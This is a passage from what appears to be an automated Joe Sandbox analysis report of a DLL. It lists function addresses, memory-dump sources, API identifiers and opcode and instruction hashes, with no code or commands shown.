                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                    • Opcode ID: dc299666d8db0e88cf6292f3b000f85687f4206e984006f9d06bc4d2a61e70bb
                                                                                                                                                                    • Instruction ID: 5de3c2bb31f9779f4fa4bcc847ffff43c3a58b5bc30a2ab1a14b8ee794b3829c
                                                                                                                                                                    • Opcode Fuzzy Hash: dc299666d8db0e88cf6292f3b000f85687f4206e984006f9d06bc4d2a61e70bb
                                                                                                                                                                    • Instruction Fuzzy Hash: 7AB1583221460A8FD745CF68C49BB957BE0FF45364F258A98E8A9CF2E1C335E991CB40
                                                                                                                                                                    Function 6E80B140 Relevance: 1.7, Strings: 1, Instructions: 420COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    • Opcode ID: 27bab2d1e03293043b6b5b652510666ad3efd6384d2caba2bf9aa8fe09b6f564
                                                                                                                                                                    • Instruction ID: e8ed4ee926ea550f4d7c26f16e108485de0aa975edbf34fb5cd07712b0297067
                                                                                                                                                                    • Opcode Fuzzy Hash: 27bab2d1e03293043b6b5b652510666ad3efd6384d2caba2bf9aa8fe09b6f564
                                                                                                                                                                    • Instruction Fuzzy Hash: D7E11332A4064A8FDF04CEFDD9A13DE77F2EB57350F109919E821EB398C6298909CB55
                                                                                                                                                                    Function 6E80C3B8 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E80C3CE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                                    • Opcode ID: 7c1fa876f964d69fd6f113033959544e8929593e5fda70c9e20efe7c655c7906
                                                                                                                                                                    • Instruction ID: a0fcffc76f05173b5fe61d2bbcc0f4cf484aa21aa4ffedf5162240597511753c
                                                                                                                                                                    • Opcode Fuzzy Hash: 7c1fa876f964d69fd6f113033959544e8929593e5fda70c9e20efe7c655c7906
                                                                                                                                                                    • Instruction Fuzzy Hash: 83518871915A058FFB45CF99C9917AEBBF1FB46310F208629D819FB286E3749904CFA0
                                                                                                                                                                    Function 6E802CE0 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    • Opcode ID: 36156879b80a34df416ba78fb2dfe5278f8e8f41f5de9363b0874d3828cf6abf
                                                                                                                                                                    • Instruction ID: 6d645273dae914b584c8a9ba88b89c33b87ecfec6eba241b02c3bee7a4152126
                                                                                                                                                                    • Opcode Fuzzy Hash: 36156879b80a34df416ba78fb2dfe5278f8e8f41f5de9363b0874d3828cf6abf
                                                                                                                                                                    • Instruction Fuzzy Hash: 35B1D036A4461ACFCF04CEFCCD99BDEB7F2AB4A310F10481AE815A7395C6798D098B10
                                                                                                                                                                    Function 6E801EF0 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    • Opcode ID: 141e03015ed8076e973798ebefc1f0f563531356b612e6d27a9b75a648d308a6
                                                                                                                                                                    • Instruction ID: 32e18e3e11d5c7e961072ba3aaf82fb8425e10e783f5a8a71faddacca01dcd9b
                                                                                                                                                                    • Opcode Fuzzy Hash: 141e03015ed8076e973798ebefc1f0f563531356b612e6d27a9b75a648d308a6
                                                                                                                                                                    • Instruction Fuzzy Hash: 97A1DE71A45209CFCB04CFECE9907DDBBF2AF4A324F005A1AE815E7396C6799949CB50
                                                                                                                                                                    Function 6E8061B0 Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    • Opcode ID: af719a4eb8558e1872ee850e672d834720a85c7bedce4b74a4f2130e3bedc59d
                                                                                                                                                                    • Instruction ID: 6c9044526fe063af170284e858941140d08b72005e0deecd922737fa34a06f7e
                                                                                                                                                                    • Opcode Fuzzy Hash: af719a4eb8558e1872ee850e672d834720a85c7bedce4b74a4f2130e3bedc59d
                                                                                                                                                                    • Instruction Fuzzy Hash: 9091DF76A542099FDF04CFECC9907CEBBF1EB0A324F101919E910EB794C239A884DB95
                                                                                                                                                                    Function 6E7F5340 Relevance: 1.5, Strings: 1, Instructions: 240COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    • Opcode ID: de5dfd8dc29e2f09c013e061152fba2e24c5ef13cf6c31f923f9da24cf350cda
                                                                                                                                                                    • Instruction ID: c47a43026359654c3c87999ca1d66d08d2cd70a4c300267d80887db8a726de33
                                                                                                                                                                    • Opcode Fuzzy Hash: de5dfd8dc29e2f09c013e061152fba2e24c5ef13cf6c31f923f9da24cf350cda
                                                                                                                                                                    • Instruction Fuzzy Hash: C181D075A04609CFDF04CEBCEA917DEBBF2AB4A355F108115D821EB364C6399D0ACB61
                                                                                                                                                                    Function 6E801BB0 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    • Opcode ID: 886924fa1012dad168daf32a00e775341aa8cb6afd5a7cf9167843becbcdc71c
                                                                                                                                                                    • Instruction ID: d71c47c2ea7054f7d5590087ea57434cdb2ef86299599640535daae7111dca87
                                                                                                                                                                    • Opcode Fuzzy Hash: 886924fa1012dad168daf32a00e775341aa8cb6afd5a7cf9167843becbcdc71c
                                                                                                                                                                    • Instruction Fuzzy Hash: A341E375E4060A8FCF04CEFCC9A13EE77F5AB0A324F105919D821EB790C7399A098B91
                                                                                                                                                                    Function 6E805410 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    • Opcode ID: 3c2406594f738d380bbe804b88ac711f9ca084ee798320afd050731cb899fd61
                                                                                                                                                                    • Instruction ID: cfab65b71b9d82331a8ff862292ae4a9686199a19fa9eed76f1ad23411431daa
                                                                                                                                                                    • Opcode Fuzzy Hash: 3c2406594f738d380bbe804b88ac711f9ca084ee798320afd050731cb899fd61
                                                                                                                                                                    • Instruction Fuzzy Hash: 2D411976A446098FDF14CFFCC9A13EF7BF2AB07321F105919C915AB384C62A45098BB0
                                                                                                                                                                    Function 6E7F9C20 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ,w
                                                                                                                                                                    • API String ID: 0-61532519
                                                                                                                                                                    • Opcode ID: a6e726e4af18339a7a4d74d7b79f0dbb6ff97a343f5f487ff1ced51552f165d4
                                                                                                                                                                    • Instruction ID: 9aa7167c218a749ae46787da9854834292325dcefa40bec0220406aa0836efa9
                                                                                                                                                                    • Opcode Fuzzy Hash: a6e726e4af18339a7a4d74d7b79f0dbb6ff97a343f5f487ff1ced51552f165d4
                                                                                                                                                                    • Instruction Fuzzy Hash: 2B41B676A141068FCB08CEFCCA952EE7BE29B62360F144329D935EB3E4C6358906C785
                                                                                                                                                                    Function 6E813810 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                    • Opcode ID: 52e793b4c9345d7a3976a2f7d0e356f763d8a56f2a797e2a250207e2e3dbab8b
                                                                                                                                                                    • Instruction ID: 136ba4b8421eb5f9a313a59ecac1a3f12f631c51b9daf71038448fc22325e414
                                                                                                                                                                    • Opcode Fuzzy Hash: 52e793b4c9345d7a3976a2f7d0e356f763d8a56f2a797e2a250207e2e3dbab8b
                                                                                                                                                                    • Instruction Fuzzy Hash: 9CA012302016018B4B008E34430A24A369855039807000024940CC0450EB244440C641
                                                                                                                                                                    Function 6E803150 Relevance: .5, Instructions: 504COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 0c4483e19794b775488b9ce2ac2f94ce7ef36a77c24ccbe985154739c455f1e2
                                                                                                                                                                    • Instruction ID: 4bcb41fe6b50d6802d5226d9144900f41241eec3f42858e3f4cd57cfbb0e86da
                                                                                                                                                                    • Opcode Fuzzy Hash: 0c4483e19794b775488b9ce2ac2f94ce7ef36a77c24ccbe985154739c455f1e2
                                                                                                                                                                    • Instruction Fuzzy Hash: 1B02D332E54609CFDB04CEEDDDD9BDD7BF2AB46350F04891AE821E7365CA298C098B05
                                                                                                                                                                    Function 6E80AB90 Relevance: .4, Instructions: 422COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 3e3bedc97e5cd7a7a4fdf51e5a8603b484954635729172a6dea1284962f5390e
                                                                                                                                                                    • Instruction ID: 6a8af32e2ae78fd9f55aedb905d39e36ca28aa7db2e793955607bb06fb222eee
                                                                                                                                                                    • Opcode Fuzzy Hash: 3e3bedc97e5cd7a7a4fdf51e5a8603b484954635729172a6dea1284962f5390e
                                                                                                                                                                    • Instruction Fuzzy Hash: 31E10676A446098FCF04CEFCD8A43DF7BF2AB56350F10A919D825EB394C63A8909CB51
                                                                                                                                                                    Function 6E808220 Relevance: .2, Instructions: 215COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b6a0384969ca03420ceee4b712b64741c50b4d452a5ca31cbcee053365f509cf
                                                                                                                                                                    • Instruction ID: 544725bb28c2548c1eca7f79577c522511bf53ed35a5db46b219979666be007e
                                                                                                                                                                    • Opcode Fuzzy Hash: b6a0384969ca03420ceee4b712b64741c50b4d452a5ca31cbcee053365f509cf
                                                                                                                                                                    • Instruction Fuzzy Hash: C5611976A80A1A4FDF048EFCC9E57DF3BE2AB47334F145618C9359B2E4C62A45498B90
                                                                                                                                                                    Function 6E804800 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 78e109803d5e933b04fff1da6b7ca98c28e9c6c27618691d8ab62f1ddb41cda8
                                                                                                                                                                    • Instruction ID: cfe071bd6dac7a2240686162b8064c7379160fe31faf987adb777ec07dcf69aa
                                                                                                                                                                    • Opcode Fuzzy Hash: 78e109803d5e933b04fff1da6b7ca98c28e9c6c27618691d8ab62f1ddb41cda8
                                                                                                                                                                    • Instruction Fuzzy Hash: 2851F372E802168FDF04CEACC9D53EE77F2AB96350F105819C815EB391D63A890BCB94
                                                                                                                                                                    Function 6E805790 Relevance: .1, Instructions: 144COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 8dfc645127bc4628a4d507e6e60788c851cec2c2015bf93f60aad53928475ed3
                                                                                                                                                                    • Instruction ID: b267e8705e8b7e6bd3fe7a4e29e38fb24ae676bea8027c002f14e1e938224ae4
                                                                                                                                                                    • Opcode Fuzzy Hash: 8dfc645127bc4628a4d507e6e60788c851cec2c2015bf93f60aad53928475ed3
                                                                                                                                                                    • Instruction Fuzzy Hash: A341D635A4030A8FCF09CF7CC9A57DE7BE1EB46320F119619E8299B395C2369905DB50
                                                                                                                                                                    Function 6E805EB0 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
